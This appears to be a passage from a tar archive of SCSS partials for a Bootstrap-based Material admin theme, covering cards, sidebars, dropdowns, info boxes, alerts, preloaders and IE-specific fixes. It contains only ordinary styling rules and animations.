.range-label {
position: absolute;
height: 30px;
width: 30px;
top: -17px;
left: -2px;
background-color: #26A69A;
border-radius: 50%;
transition: border-radius 0.25s cubic-bezier(0.215, 0.61, 0.355, 1), transform 0.25s cubic-bezier(0.215, 0.61, 0.355, 1);
transform: scale(0.5) rotate(-45deg);
transform-origin: 50% 100%;
}
.noUi-active .range-label {
border-radius: 15px 15px 15px 0;
transform: rotate(-45deg) translate(23px, -25px);
}
}
.range-label span {
width: 100%;
text-align: center;
color: #fff;
font-size: 12px;
transform: rotate(45deg);
opacity: 0;
position: absolute;
top: 7px;
left: -1px;
transition: opacity 0.25s cubic-bezier(0.215, 0.61, 0.355, 1);
}
.noUi-active .range-label span {
opacity: 1;
}
_progressbars.scss 0000644 00000000657 15076416166 0010340 0 ustar 00 .progress {
@include border-radius(0);
height: 22px;
.progress-bar {
line-height: 23px;
background-color: #1f91f3;
}
.progress-bar-success {
background-color: #2b982b;
}
.progress-bar-info {
background-color: #00b0e4;
}
.progress-bar-warning {
background-color: #ff9600;
}
.progress-bar-danger {
background-color: #fb483a;
}
}
_tagsinput.scss 0000644 00000000142 15076416166 0007627 0 ustar 00 .bootstrap-tagsinput {
@include box-shadow(none !important);
border: none !important;
} _dropzone.scss 0000644 00000000510 15076416166 0007450 0 ustar 00 .dropzone {
border: 2px solid transparent !important;
background-color: #eee !important;
.dz-message {
.drag-icon-cph {
.material-icons {
font-size: 80px;
color: #777;
}
}
}
}
.dz-drag-hover {
border: 2px dashed #888 !important;
}
_jquerydatatable.scss 0000644 00000002671 15076416166 0011003 0 ustar 00 .dataTables_wrapper {
position: relative;
select {
border: none;
border-bottom: 1px solid #ddd;
@include border-radius(0);
@include box-shadow(none);
&:active,
&:focus {
@include box-shadow(none);
}
}
input[type="search"] {
@include border-radius(0);
@include box-shadow(none);
border: none;
font-size: 12px;
border-bottom: 1px solid #ddd;
&:focus,
&:active {
border-bottom: 2px solid #1f91f3;
}
}
.dt-buttons {
float: left;
a.dt-button {
background-color: #607D8B;
color: #fff;
padding: 7px 12px;
margin-right: 5px;
text-decoration: none;
box-shadow: 0 2px 5px rgba(0, 0, 0, 0.16), 0 2px 10px rgba(0, 0, 0, 0.12);
@include border-radius(2px);
border: none;
font-size: 13px;
outline: none;
&:active {
opacity: 0.8;
}
}
}
}
.dt-button-info {
position: fixed;
top: 50%;
left: 50%;
min-width: 400px;
text-align: center;
background-color: #fff;
border: 2px solid #999;
@include border-radius(3px);
margin-top: -100px;
margin-left: -200px;
z-index: 21;
h2 {
color: #777;
}
div {
color: #777;
margin-bottom: 20px;
}
}
_bootstrapselect.scss 0000644 00000003071 15076416166 0011032 0 ustar 00 .bootstrap-select {
box-shadow: none !important;
border-bottom: 1px solid #ddd !important;
@include border-radius(0);
.dropdown-toggle {
&:focus,
&:active {
outline: none !important;
}
}
.bs-searchbox,
.bs-actionsbox,
.bs-donebutton {
padding: 0 0 5px 0;
border-bottom: 1px solid #e9e9e9;
.form-control {
@include border-radius(0);
@include box-shadow(none !important);
border: none;
margin-left: 30px;
}
}
.bs-searchbox {
position: relative;
&:after {
content: '\E8B6';
font-family: 'Material Icons';
position: absolute;
top: 0;
left: 10px;
font-size: 25px;
}
}
ul.dropdown-menu {
margin-top: 0 !important;
}
.dropdown-menu {
li.selected {
a {
background-color: #eee !important;
color: #555 !important;
}
}
.active {
a {
background-color: transparent;
color: #333 !important;
}
}
.notify {
background-color: #F44336 !important;
color: #fff !important;
border: none !important;
}
}
}
.bootstrap-select.btn-group.show-tick {
.dropdown-menu {
li.selected {
a {
span.check-mark {
margin-top: 9px;
}
}
}
}
}
_customanimate.scss 0000644 00000003332 15076416166 0010466 0 ustar 00 @-ms-keyframes spin {
from {
-ms-transform: rotate(0deg);
-moz-transform: rotate(0deg);
-o-transform: rotate(0deg);
-webkit-transform: rotate(0deg);
transform: rotate(0deg);
}
to {
-ms-transform: rotate(360deg);
-moz-transform: rotate(360deg);
-o-transform: rotate(360deg);
-webkit-transform: rotate(360deg);
transform: rotate(360deg);
}
}
@-moz-keyframes spin {
from {
-moz-transform: rotate(0deg);
-ms-transform: rotate(0deg);
-o-transform: rotate(0deg);
-webkit-transform: rotate(0deg);
transform: rotate(0deg);
}
to {
-moz-transform: rotate(360deg);
-ms-transform: rotate(360deg);
-o-transform: rotate(360deg);
-webkit-transform: rotate(360deg);
transform: rotate(360deg);
}
}
@-webkit-keyframes spin {
from {
-webkit-transform: rotate(0deg);
-moz-transform: rotate(0deg);
-ms-transform: rotate(0deg);
-o-transform: rotate(0deg);
transform: rotate(0deg);
}
to {
-webkit-transform: rotate(360deg);
-moz-transform: rotate(360deg);
-ms-transform: rotate(360deg);
-o-transform: rotate(360deg);
transform: rotate(360deg);
}
}
@keyframes spin {
from {
-moz-transform: rotate(0deg);
-ms-transform: rotate(0deg);
-o-transform: rotate(0deg);
-webkit-transform: rotate(0deg);
transform: rotate(0deg);
}
to {
-moz-transform: rotate(360deg);
-ms-transform: rotate(360deg);
-o-transform: rotate(360deg);
-webkit-transform: rotate(360deg);
transform: rotate(360deg);
}
} _alerts.scss 0000644 00000001112 15076416166 0007101 0 ustar 00 .alert {
@include border-radius(0);
@include box-shadow(none);
border: none;
color: #fff !important;
.alert-link {
color: #fff;
text-decoration: underline;
font-weight: bold;
}
}
.alert-success {
background-color: #2b982b;
}
.alert-info {
background-color: #00b0e4;
}
.alert-warning {
background-color: #ff9600 !important;
}
.alert-danger {
background-color: #fb483a !important;
}
.alert-dismissible {
.close {
color: #fff;
opacity: 1;
border: none;
text-shadow: none;
}
}
_dropdownmenu.scss 0000644 00000005753 15076416166 0010347 0 ustar 00 .dropdown-menu {
@include border-radius(0);
margin-top: -35px !important;
box-shadow: 0 2px 10px rgba(0,0,0,.2);
border: none;
.divider {
margin: 5px 0;
}
.header {
font-size: 13px;
font-weight: bold;
min-width: 270px;
border-bottom: 1px solid #eee;
text-align: center;
padding: 4px 0 6px 0;
}
ul.menu {
padding-left: 0;
&.tasks {
h4 {
color: #333;
font-size: 13px;
margin: 0 0 8px 0;
small {
float: right;
margin-top: 6px;
}
}
.progress {
height: 7px;
margin-bottom: 7px;
}
}
.icon-circle {
width: 36px;
height: 36px;
@include border-radius(50%);
color: #fff;
text-align: center;
display: inline-block;
i {
font-size: 18px;
line-height: 36px;
}
}
li {
border-bottom: 1px solid #eee;
&:last-child {
border-bottom: none;
}
a {
padding: 7px 11px;
text-decoration: none;
@include transition(.5s);
&:hover {
background-color: #e9e9e9;
}
}
}
.menu-info {
display: inline-block;
position: relative;
top: 3px;
left: 5px;
h4 {
margin: 0;
font-size: 13px;
color: #333;
}
p {
margin: 0;
font-size: 11px;
color: #aaa;
.material-icons {
font-size: 13px;
color: #aaa;
position: relative;
top: 2px;
}
}
}
}
.footer {
a {
text-align: center;
border-top: 1px solid #eee;
padding: 5px 0 5px 0;
font-size: 12px;
margin-bottom: -5px;
&:hover {
background-color: transparent;
}
}
}
> li {
> a {
padding: 7px 18px;
color: #666;
@include transition(all .5s);
font-size: 14px;
line-height: 25px;
&:hover {
background-color: rgba(0,0,0,0.075);
}
i.material-icons {
float: left;
margin-right: 7px;
margin-top: 2px;
font-size: 20px;
}
}
}
}
.dropdown-animated {
-webkit-animation-duration: .3s !important;
-moz-animation-duration: .3s !important;
-o-animation-duration: .3s !important;
animation-duration: .3s !important;
}
_mediaobject.scss 0000644 00000000347 15076416166 0010066 0 ustar 00 .media {
margin-bottom: 25px;
.media-body {
color: #777;
font-size: 13px;
.media-heading {
font-size: 16px;
font-weight: bold;
color: #333;
}
}
}
_materialicons.scss 0000644 00000000527 15076416166 0010452 0 ustar 00 .material-icons.md-18 { font-size: 18px; }
.material-icons.md-24 { font-size: 24px; }
.material-icons.md-26 { font-size: 26px; }
.material-icons.md-28 { font-size: 28px; }
.material-icons.md-30 { font-size: 30px; }
.material-icons.md-32 { font-size: 32px; }
.material-icons.md-36 { font-size: 36px; }
.material-icons.md-48 { font-size: 48px; } _navtabs.scss 0000644 00000002730 15076416166 0007254 0 ustar 00 .nav-tabs {
border-bottom: 2px solid #eee;
> li {
position: relative;
top: 3px;
left: -2px;
> a {
border: none !important;
color: #999 !important;
@include border-radius(0);
&:hover,
&:active,
&:focus {
background-color: transparent !important;
}
&:before {
content: '';
position: absolute;
left: 0;
width: 100%;
height: 0;
border-bottom: 2px solid #2196F3;
bottom: 2px;
@include transform(scaleX(0));
@include transition(0.1s ease-in);
}
.material-icons {
position: relative;
top: 7px;
margin-bottom: 8px;
}
}
}
li.active {
a {
color: #222 !important;
&:hover,
&:active,
&:focus {
background-color: transparent !important;
}
&:before {
@include transform(scaleX(1));
}
}
}
+ .tab-content {
padding: 15px 0;
}
}
@each $key, $val in $colors {
.nav-tabs.tab-col-#{$key} {
> li {
> a {
&:before {
border-bottom: 2px solid $val;
}
}
}
}
}
_infobox.scss 0000644 00000017223 15076416166 0007265 0 ustar 00 .info-box {
box-shadow: 0 2px 10px rgba(0,0,0,.2);
height: 80px;
display: flex;
cursor: default;
background-color: #fff;
position: relative;
overflow: hidden;
margin-bottom: 30px;
.icon {
display: inline-block;
text-align: center;
background-color: rgba(0,0,0,0.12);
width: 80px;
i {
color: #fff;
font-size: 50px;
line-height: 80px;
}
.chart.chart-bar {
height: 100%;
line-height: 100px;
canvas {
vertical-align: baseline !important;
}
}
.chart.chart-pie {
height: 100%;
line-height: 123px;
canvas {
vertical-align: baseline !important;
}
}
.chart.chart-line {
height: 100%;
line-height: 115px;
canvas {
vertical-align: baseline !important;
}
}
}
.content {
display: inline-block;
padding: 7px 10px;
.text {
font-size: 13px;
margin-top: 11px;
color: #555;
}
.number {
font-weight: normal;
font-size: 26px;
margin-top: -4px;
color: #555;
}
}
}
.info-box.hover-zoom-effect {
.icon {
overflow: hidden;
i {
@include transition(all .3s ease);
}
}
&:hover {
.icon {
i {
opacity: 0.4;
@include transform(rotate(-32deg) scale(1.4));
}
}
}
}
.info-box.hover-expand-effect {
&:after {
background-color: rgba(0,0,0,0.05);
content: ".";
position: absolute;
left: 80px;
top: 0;
width: 0;
height: 100%;
color: transparent;
@include transition(all .95s);
}
&:hover {
&:after {
width: 100%;
}
}
}
.info-box-2 {
box-shadow: 0 2px 10px rgba(0,0,0,.2);
height: 80px;
display: flex;
cursor: default;
background-color: #fff;
position: relative;
overflow: hidden;
margin-bottom: 30px;
.icon {
display: inline-block;
text-align: center;
width: 80px;
i {
color: #fff;
font-size: 50px;
line-height: 80px;
}
}
.chart.chart-bar {
height: 100%;
line-height: 105px;
canvas {
vertical-align: baseline !important;
}
}
.chart.chart-pie {
height: 100%;
line-height: 123px;
canvas {
vertical-align: baseline !important;
}
}
.chart.chart-line {
height: 100%;
line-height: 115px;
canvas {
vertical-align: baseline !important;
}
}
.content {
display: inline-block;
padding: 7px 10px;
.text {
font-size: 13px;
margin-top: 11px;
color: #555;
}
.number {
font-weight: normal;
font-size: 26px;
margin-top: -4px;
color: #555;
}
}
}
.info-box-2.hover-zoom-effect {
.icon {
overflow: hidden;
i {
@include transition(all .3s ease);
}
}
&:hover {
.icon {
i {
opacity: 0.4;
@include transform(rotate(-32deg) scale(1.4));
}
}
}
}
.info-box-2.hover-expand-effect {
&:after {
background-color: rgba(0,0,0,0.05);
content: ".";
position: absolute;
left: 0;
top: 0;
width: 0;
height: 100%;
color: transparent;
@include transition(all .95s);
}
&:hover {
&:after {
width: 100%;
}
}
}
.info-box-3 {
box-shadow: 0 2px 10px rgba(0,0,0,.2);
height: 80px;
display: flex;
cursor: default;
background-color: #fff;
position: relative;
overflow: hidden;
margin-bottom: 30px;
.icon {
position: absolute;
right: 10px;
bottom: 2px;
text-align: center;
i {
color: rgba(0,0,0,0.15);
font-size: 60px;
}
}
.chart {
margin-right: 5px;
}
.chart.chart-bar {
height: 100%;
line-height: 50px;
canvas {
vertical-align: baseline !important;
}
}
.chart.chart-pie {
height: 100%;
line-height: 34px;
canvas {
vertical-align: baseline !important;
}
}
.chart.chart-line {
height: 100%;
line-height: 40px;
canvas {
vertical-align: baseline !important;
}
}
.content {
display: inline-block;
padding: 7px 16px;
.text {
font-size: 13px;
margin-top: 11px;
color: #555;
}
.number {
font-weight: normal;
font-size: 26px;
margin-top: -4px;
color: #555;
}
}
}
.info-box-3.hover-zoom-effect {
.icon {
i {
@include transition(all .3s ease);
}
}
&:hover {
.icon {
i {
opacity: 0.4;
@include transform(rotate(-32deg) scale(1.4));
}
}
}
}
.info-box-3.hover-expand-effect {
&:after {
background-color: rgba(0,0,0,0.05);
content: ".";
position: absolute;
left: 0;
top: 0;
width: 0;
height: 100%;
color: transparent;
@include transition(all .95s);
}
&:hover {
&:after {
width: 100%;
}
}
}
.info-box-4 {
box-shadow: 0 2px 10px rgba(0,0,0,.2);
height: 80px;
display: flex;
cursor: default;
background-color: #fff;
position: relative;
overflow: hidden;
margin-bottom: 30px;
.icon {
position: absolute;
right: 10px;
bottom: 2px;
text-align: center;
i {
color: rgba(0,0,0,0.15);
font-size: 60px;
}
}
.chart {
margin-right: 5px;
}
.chart.chart-bar {
height: 100%;
line-height: 50px;
canvas {
vertical-align: baseline !important;
}
}
.chart.chart-pie {
height: 100%;
line-height: 34px;
canvas {
vertical-align: baseline !important;
}
}
.chart.chart-line {
height: 100%;
line-height: 40px;
canvas {
vertical-align: baseline !important;
}
}
.content {
display: inline-block;
padding: 7px 16px;
.text {
font-size: 13px;
margin-top: 11px;
color: #555;
}
.number {
font-weight: normal;
font-size: 26px;
margin-top: -4px;
color: #555;
}
}
}
.info-box-4.hover-zoom-effect {
.icon {
i {
@include transition(all .3s ease);
}
}
&:hover {
.icon {
i {
opacity: 0.4;
@include transform(rotate(-32deg) scale(1.4));
}
}
}
}
.info-box-4.hover-expand-effect {
&:after {
background-color: rgba(0,0,0,0.05);
content: ".";
position: absolute;
left: 0;
top: 0;
width: 0;
height: 100%;
color: transparent;
@include transition(all .95s);
}
&:hover {
&:after {
width: 100%;
}
}
}
_waveseffect.scss 0000644 00000000270 15076416166 0010115 0 ustar 00 .waves-effect {
@each $key, $val in $colors {
&.waves-#{$key} {
.waves-ripple {
background: rgba($val, 0.5);
}
}
}
}
_card.scss 0000644 00000005321 15076416166 0006526 0 ustar 00 .card {
background: #fff;
min-height: 50px;
box-shadow: 0 2px 10px rgba(0, 0, 0, 0.20);
position: relative;
margin-bottom: 30px;
@include border-radius(2px);
.card-inside-title {
margin-top: 25px;
margin-bottom: 15px;
display: block;
font-size: 15px;
color: #000;
small {
color: #999;
display: block;
font-size: 11px;
margin-top: 5px;
a {
color: #777;
font-weight: bold;
}
}
}
.card-inside-title:first-child {
margin-top: 0;
}
.bg-red,
.bg-pink,
.bg-purple,
.bg-deep-purple,
.bg-indigo,
.bg-blue,
.bg-light-blue,
.bg-cyan,
.bg-teal,
.bg-green,
.bg-light-green,
.bg-lime,
.bg-yellow,
.bg-amber,
.bg-orange,
.bg-deep-orange,
.bg-brown,
.bg-grey,
.bg-blue-grey,
.bg-black {
border-bottom: none !important;
color: #fff !important;
h2, small, .material-icons {
color: #fff !important;
}
.badge {
background-color: #fff;
color: #555;
}
}
.header {
color: #555;
padding: 20px;
position: relative;
border-bottom: 1px solid rgba(204,204,204,0.35);
.header-dropdown {
position: absolute;
top: 20px;
right: 15px;
list-style: none;
.dropdown-menu {
li {
display: block !important;
}
}
li {
display: inline-block;
}
i {
font-size: 20px;
color: #999;
@include transition(all .5s);
&:hover {
color: #000;
}
}
}
h2 {
margin: 0;
font-size: 18px;
font-weight: normal;
color: #111;
small {
display: block;
font-size: 12px;
margin-top: 5px;
color: #999;
line-height: 15px;
a {
font-weight: bold;
color: #777;
}
}
}
.col-xs-12 {
h2 {
margin-top: 5px;
}
}
}
.body {
font-size: 14px;
color: #555;
padding: 20px;
@for $i from 1 through 12 {
.col-xs-#{$i},
.col-sm-#{$i},
.col-md-#{$i},
.col-lg-#{$i} {
margin-bottom: 20px;
}
}
}
}
_labels.scss 0000644 00000000450 15076416166 0007055 0 ustar 00 .label {
@include border-radius(0);
}
.label-primary {
background-color: #1f91f3;
}
.label-success {
background-color: #2b982b;
}
.label-info {
background-color: #00b0e4;
}
.label-warning {
background-color: #ff9600;
}
.label-danger {
background-color: #fb483a;
}
_searchbar.scss 0000644 00000001501 15076416166 0007543 0 ustar 00 .search-bar {
position: fixed;
top: -100px;
left: 0;
z-index: 9999999;
width: 100%;
@include transition(.25s);
&.open {
top: 0;
}
.search-icon {
position: absolute;
top: 20px;
left: 14px;
.material-icons {
font-size: 32px;
color: #999;
}
}
.close-search {
position: absolute;
cursor: pointer;
font-size: 30px;
top: 16px;
right: 18px;
.material-icons {
color: #999;
opacity: 1;
@include transition(.5s);
&:hover {
opacity: .5;
}
}
}
input[type="text"] {
width: 100%;
font-size: 16px;
padding: 25px 60px 23px 56px;
border: none;
}
}
_leftsidebaroverlay.scss 0000644 00000015602 15076416166 0011506 0 ustar 00 .overlay {
position: fixed;
cursor: pointer;
top: 0;
left: 0;
right: 0;
bottom: 0;
background-color: rgba(0,0,0,0.5);
display: none;
z-index: 10;
}
.overlay-open {
.sidebar {
margin-left: 0;
z-index: 99999999;
}
}
.sidebar {
@include transition(all .5s);
font-family: $sidebar-font-family;
background: #fdfdfd;
width: 300px;
overflow: hidden;
display: inline-block;
height: calc(100vh - 70px);
position: fixed;
top: 70px;
left: 0;
@include box-shadow(2px 2px 5px rgba(0, 0, 0, 0.1));
z-index: 11 !important;
.legal {
position: absolute;
bottom: 0;
width: 100%;
border-top: 1px solid #eee;
padding: 15px;
overflow: hidden;
.copyright {
font-size: 13px;
@include three-dots-overflow();
a {
font-weight: bold;
text-decoration: none;
}
}
.version {
@include three-dots-overflow();
margin-top: 5px;
font-size: 13px;
}
}
.user-info {
padding: 13px 15px 12px 15px;
white-space: nowrap;
position: relative;
border-bottom: 1px solid #e9e9e9;
background: url('../images/user-img-background.jpg') no-repeat no-repeat;
height: 135px;
.image {
margin-right: 12px;
display: inline-block;
img {
@include border-radius(50%);
vertical-align: bottom !important;
}
}
.info-container {
cursor: default;
display: block;
position: relative;
top: 25px;
.name {
@include three-dots-overflow();
font-size: 14px;
max-width: 200px;
color: #fff;
}
.email {
@include three-dots-overflow();
font-size: 12px;
max-width: 200px;
color: #fff;
}
.user-helper-dropdown {
position: absolute;
right: -3px;
bottom: -12px;
@include box-shadow(none);
cursor: pointer;
color: #fff;
}
}
}
.menu {
position: relative;
overflow-y: auto;
height: 90vh;
.list {
list-style: none;
padding-left: 0;
li {
&.active {
> :first-child {
span {
font-weight: bold;
}
}
}
}
.header {
background: #eee;
font-size: 12px;
font-weight: 600;
padding: 8px 16px;
}
i.material-icons {
margin-top: 4px;
}
.menu-toggle {
&:after, &:before {
position: absolute;
top: calc(50% - 14px);
right: 17px;
font-size: 19px;
@include transform(scale(0));
@include transition(all .3s);
}
&:before {
content: '+';
@include transform(scale(1));
}
&:after {
content: '\2013';
@include transform(scale(0));
}
}
.menu-toggle.toggled {
&:before {
@include transform(scale(0));
}
&:after {
@include transform(scale(1));
}
}
a {
color: #747474;
position: relative;
display: inline-flex;
vertical-align: middle;
width: 100%;
padding: 10px 13px;
&:hover,
&:active,
&:focus {
text-decoration: none !important;
}
small {
position: absolute;
top: calc(50% - 7.5px);
right: 15px;
}
span {
margin: 7px 0 7px 12px;
color: #333;
font-weight: bold;
font-size: 14px;
overflow: hidden;
}
}
.ml-menu {
list-style: none;
display: none;
padding-left: 0;
span {
font-weight: normal;
font-size: 14px;
margin: 3px 0 1px 6px;
}
li {
a {
padding-left: 55px;
padding-top: 7px;
padding-bottom: 7px;
}
&.active {
a.toggled:not(.menu-toggle) {
font-weight: 600;
margin-left: 5px;
&:before {
content: '\E315';
font-family: 'Material Icons';
position: relative;
font-size: 21px;
height: 20px;
top: -5px;
right: 0px;
}
}
}
.ml-menu {
li {
a {
padding-left: 80px;
}
}
.ml-menu {
li {
a {
padding-left: 95px;
}
}
}
}
}
}
}
}
}
.right-sidebar {
width: 280px;
height: calc(100vh - 70px);
position: fixed;
right: -300px;
top: 70px;
background: #fdfdfd;
z-index: 11 !important;
@include box-shadow(-2px 2px 5px rgba(0, 0, 0, 0.1));
overflow: hidden;
@include transition(.5s);
&.open {
right: 0;
}
.nav-tabs {
font-weight: 600;
font-size: 13px;
width: 100%;
margin-left: 2px;
li {
text-align: center;
> a {
margin-right: 0;
}
&:first-child {
width: 45%;
}
&:last-child {
width: 55%;
}
}
}
}
_badgelistgroupitem.scss 0000644 00000004522 15076416166 0011511 0 ustar 00 .badge {
@include border-radius(2px)
}
.list-group-item {
@include border-radius(0);
@include transition(.5s);
}
.list-group {
.active {
background-color: #2196F3;
border-color: #2196F3;
&:hover,
&:focus,
&:active {
background-color: #2196F3;
border-color: #2196F3;
}
.list-group-item-text {
color: #dfe9f1;
font-size: 13px;
&:hover,
&:active,
&:focus {
color: #dfe9f1;
}
}
}
.list-group-item.active {
&:hover,
&:focus,
&:active {
.list-group-item-text {
color: #dfe9f1;
}
}
}
.list-group-item {
&:first-child,
&:last-child {
@include border-radius(0);
}
.list-group-item-heading {
font-weight: bold;
font-size: 17px;
}
}
.list-group-item-success {
background-color: #2b982b;
border: none;
color: #fff;
&:hover,
&:focus {
background-color: #2b982b;
color: #fff;
opacity: 0.8;
}
}
.list-group-item-info {
background-color: #00b0e4;
border: none;
color: #fff;
&:hover,
&:focus {
background-color: #00b0e4;
color: #fff;
opacity: 0.8;
}
}
.list-group-item-warning {
background-color: #ff9600;
border: none;
color: #fff;
&:hover,
&:focus {
background-color: #ff9600;
color: #fff;
opacity: 0.8;
}
}
.list-group-item-danger {
background-color: #fb483a;
border: none;
color: #fff;
&:hover,
&:focus {
background-color: #fb483a;
color: #fff;
opacity: 0.8;
}
}
@each $key, $val in $colors {
.pl-#{$key} {
stroke: $val;
}
.list-group-bg-#{$key} {
background-color: $val;
border: none;
color: #fff;
&:hover,
&:focus {
background-color: $val;
color: #fff;
opacity: 0.8;
}
}
}
}
browser-support/_ie10.scss 0000644 00000002764 15076416166 0011560 0 ustar 00 html {
&.ie10 {
.sidebar {
.menu {
.list {
li {
line-height: 30px;
}
.ml-menu {
li {
&.active {
a {
&:not(.menu-toggle) {
&.toggled {
&:before {
top: 6px !important;
line-height: 20px !important;
}
}
}
}
}
}
}
}
}
.user-info {
.info-container {
top: 15px;
}
}
}
.search-bar {
input[type="text"] {
padding: 26px 60px 26px 56px;
}
}
.dropdown-menu {
ul {
&.menu {
li {
a {
margin-top: -22px;
}
}
}
}
}
.bs-searchbox {
.form-control {
width: 90%;
}
}
}
}
browser-support/_ie11.scss 0000644 00000002631 15076416166 0011552 0 ustar 00 html {
&.ie11 {
.sidebar {
.menu {
.list {
.ml-menu {
li {
&.active {
a {
&:not(.menu-toggle) {
&.toggled {
&:before {
top: 6px !important;
line-height: 20px !important;
}
}
}
}
}
}
}
}
}
.user-info {
.info-container {
top: 15px;
}
}
}
.search-bar {
input[type="text"] {
padding: 26px 60px 26px 56px;
}
}
.dropdown-menu {
ul {
&.menu {
li {
a {
margin-top: -22px;
}
}
}
}
}
.bs-searchbox {
.form-control {
width: 90%;
}
}
}
}
_colorpicker.scss 0000644 00000000151 15076416166 0010125 0 ustar 00 .colorpicker {
z-index: 1;
&:before,
&:after {
display: none !important;
}
}
_preloaders.scss 0000644 00000020776 15076416166 0007770 0 ustar 00 .md-preloader {
@each $key, $val in $colors {
.pl-#{$key} {
stroke: $val;
}
}
}
.preloader {
display: inline-block;
position: relative;
width: 50px;
height: 50px;
-webkit-animation: container-rotate 1568ms linear infinite;
-moz-animation: container-rotate 1568ms linear infinite;
-o-animation: container-rotate 1568ms linear infinite;
animation: container-rotate 1568ms linear infinite;
&.pl-size-xl {
width: 75px;
height: 75px;
}
&.pl-size-l {
width: 60px;
height: 60px;
}
&.pl-size-md {
width: 50px;
height: 50px;
}
&.pl-size-sm {
width: 40px;
height: 40px;
}
&.pl-size-xs {
width: 25px;
height: 25px;
}
}
.spinner-layer {
position: absolute;
width: 100%;
height: 100%;
border-color: #F44336;
-ms-opacity: 1;
opacity: 1;
-webkit-animation: fill-unfill-rotate 5332ms cubic-bezier(0.4, 0, 0.2, 1) infinite both;
-moz-animation: fill-unfill-rotate 5332ms cubic-bezier(0.4, 0, 0.2, 1) infinite both;
-o-animation: fill-unfill-rotate 5332ms cubic-bezier(0.4, 0, 0.2, 1) infinite both;
animation: fill-unfill-rotate 5332ms cubic-bezier(0.4, 0, 0.2, 1) infinite both;
@each $key, $val in $colors {
&.pl-#{$key} {
border-color: $val;
}
}
}
.right {
float: right !important;
}
.gap-patch {
position: absolute;
top: 0;
left: 45%;
width: 10%;
height: 100%;
overflow: hidden;
border-color: inherit;
&.circle {
width: 1000%;
left: -450%;
}
}
.circle-clipper {
display: inline-block;
position: relative;
width: 50%;
height: 100%;
overflow: hidden;
border-color: inherit;
.circle {
width: 200%;
height: 100%;
border-width: 3px;
border-style: solid;
border-color: inherit;
border-bottom-color: transparent !important;
-ms-border-radius: 50%;
border-radius: 50%;
-webkit-animation: none;
animation: none;
position: absolute;
top: 0;
right: 0;
bottom: 0;
}
&.left {
.circle {
left: 0;
border-right-color: transparent !important;
-webkit-transform: rotate(129deg);
-moz-transform: rotate(129deg);
-ms-transform: rotate(129deg);
-o-transform: rotate(129deg);
transform: rotate(129deg);
-webkit-animation: left-spin 1333ms cubic-bezier(0.4, 0, 0.2, 1) infinite both;
-moz-animation: left-spin 1333ms cubic-bezier(0.4, 0, 0.2, 1) infinite both;
-o-animation: left-spin 1333ms cubic-bezier(0.4, 0, 0.2, 1) infinite both;
animation: left-spin 1333ms cubic-bezier(0.4, 0, 0.2, 1) infinite both;
}
}
&.right {
.circle {
left: -100%;
border-left-color: transparent !important;
-webkit-transform: rotate(-129deg);
-moz-transform: rotate(-129deg);
-ms-transform: rotate(-129deg);
-o-transform: rotate(-129deg);
transform: rotate(-129deg);
-webkit-animation: right-spin 1333ms cubic-bezier(0.4, 0, 0.2, 1) infinite both;
-moz-animation: right-spin 1333ms cubic-bezier(0.4, 0, 0.2, 1) infinite both;
-o-animation: right-spin 1333ms cubic-bezier(0.4, 0, 0.2, 1) infinite both;
animation: right-spin 1333ms cubic-bezier(0.4, 0, 0.2, 1) infinite both;
}
}
}
@-webkit-keyframes container-rotate {
to {
-webkit-transform: rotate(360deg);
-moz-transform: rotate(360deg);
-ms-transform: rotate(360deg);
-o-transform: rotate(360deg);
transform: rotate(360deg);
}
}
@keyframes container-rotate {
to {
-moz-transform: rotate(360deg);
-ms-transform: rotate(360deg);
-o-transform: rotate(360deg);
-webkit-transform: rotate(360deg);
transform: rotate(360deg);
}
}
@-webkit-keyframes fill-unfill-rotate {
12.5% {
-webkit-transform: rotate(135deg);
transform: rotate(135deg);
}
25% {
-webkit-transform: rotate(270deg);
transform: rotate(270deg);
}
37.5% {
-webkit-transform: rotate(405deg);
transform: rotate(405deg);
}
50% {
-webkit-transform: rotate(540deg);
transform: rotate(540deg);
}
62.5% {
-webkit-transform: rotate(675deg);
transform: rotate(675deg);
}
75% {
-webkit-transform: rotate(810deg);
transform: rotate(810deg);
}
87.5% {
-webkit-transform: rotate(945deg);
transform: rotate(945deg);
}
to {
-webkit-transform: rotate(1080deg);
transform: rotate(1080deg);
}
}
@keyframes fill-unfill-rotate {
12.5% {
transform: rotate(135deg);
}
25% {
transform: rotate(270deg);
}
37.5% {
transform: rotate(405deg);
}
50% {
transform: rotate(540deg);
}
62.5% {
transform: rotate(675deg);
}
75% {
transform: rotate(810deg);
}
87.5% {
transform: rotate(945deg);
}
to {
transform: rotate(1080deg);
}
}
@-webkit-keyframes left-spin {
from {
-webkit-transform: rotate(130deg);
-moz-transform: rotate(130deg);
-ms-transform: rotate(130deg);
-o-transform: rotate(130deg);
transform: rotate(130deg);
}
50% {
-webkit-transform: rotate(-5deg);
-moz-transform: rotate(-5deg);
-ms-transform: rotate(-5deg);
-o-transform: rotate(-5deg);
transform: rotate(-5deg);
}
to {
-webkit-transform: rotate(130deg);
-moz-transform: rotate(130deg);
-ms-transform: rotate(130deg);
-o-transform: rotate(130deg);
transform: rotate(130deg);
}
}
@keyframes left-spin {
from {
-moz-transform: rotate(130deg);
-ms-transform: rotate(130deg);
-o-transform: rotate(130deg);
-webkit-transform: rotate(130deg);
transform: rotate(130deg);
}
50% {
-moz-transform: rotate(-5deg);
-ms-transform: rotate(-5deg);
-o-transform: rotate(-5deg);
-webkit-transform: rotate(-5deg);
transform: rotate(-5deg);
}
to {
-moz-transform: rotate(130deg);
-ms-transform: rotate(130deg);
-o-transform: rotate(130deg);
-webkit-transform: rotate(130deg);
transform: rotate(130deg);
}
}
@-webkit-keyframes right-spin {
from {
-webkit-transform: rotate(-130deg);
-moz-transform: rotate(-130deg);
-ms-transform: rotate(-130deg);
-o-transform: rotate(-130deg);
transform: rotate(-130deg);
}
50% {
-webkit-transform: rotate(5deg);
-moz-transform: rotate(5deg);
-ms-transform: rotate(5deg);
-o-transform: rotate(5deg);
transform: rotate(5deg);
}
to {
-webkit-transform: rotate(-130deg);
-moz-transform: rotate(-130deg);
-ms-transform: rotate(-130deg);
-o-transform: rotate(-130deg);
transform: rotate(-130deg);
}
}
@-moz-keyframes right-spin {
from {
-moz-transform: rotate(-130deg);
-ms-transform: rotate(-130deg);
-o-transform: rotate(-130deg);
-webkit-transform: rotate(-130deg);
transform: rotate(-130deg);
}
50% {
-moz-transform: rotate(5deg);
-ms-transform: rotate(5deg);
-o-transform: rotate(5deg);
-webkit-transform: rotate(5deg);
transform: rotate(5deg);
}
to {
-moz-transform: rotate(-130deg);
-ms-transform: rotate(-130deg);
-o-transform: rotate(-130deg);
-webkit-transform: rotate(-130deg);
